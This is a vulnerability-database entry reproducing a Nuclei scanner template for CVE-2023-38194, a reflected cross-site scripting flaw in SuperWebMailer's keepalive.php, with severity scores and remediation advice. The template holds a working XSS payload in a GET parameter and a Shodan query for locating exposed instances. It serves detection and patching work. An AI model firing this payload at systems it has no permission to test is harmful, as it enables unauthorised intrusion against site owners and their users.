Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-38194
HistoryJun 07, 2024 - 10:19 a.m.

SuperWebMailer - Cross-Site Scripting

2024-06-0710:19:17
ProjectDiscovery
github.com
8
superwebmailer
cve-2023-38194
xss
input validation
output encoding
data theft
account compromise.

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5.7

Confidence

High

EPSS

0.001

Percentile

31.4%

An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter.
id: CVE-2023-38194

info:
  name: SuperWebMailer - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter.
  impact: |
    Successful exploitation could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or account compromise.
  remediation: |
    Implement input validation and output encoding to prevent XSS attacks in the SuperWebMailer keepalive.php script.
  reference:
    - https://herolab.usd.de/security-advisories/usd-2023-0013/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38194
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-38194
    cwe-id: CWE-79
    epss-score: 0.00046
    epss-percentile: 0.15636
    cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.00.0.01710:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: superwebmailer
    product: superwebmailer
    shodan-query: title:"SuperWebMailer"
  tags: cve,cve2023,superwebmailer,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<img src=1 onerror=alert(document.domain) />")'
          - 'contains(tolower(body_1), "superwebmailer")'
          - 'contains(header_2, "text/html")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a004730450221009a1a97d60d7b7c57df8826164505d09ec5c7d5cc478cb403655ef61e1ebd1ecc02203aa006f1ef4aa619fc4a2cc86edf00014ad8c66b585e5d1d8e98faa109232263:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5.7

Confidence

High

EPSS

0.001

Percentile

31.4%

Related for NUCLEI:CVE-2023-38194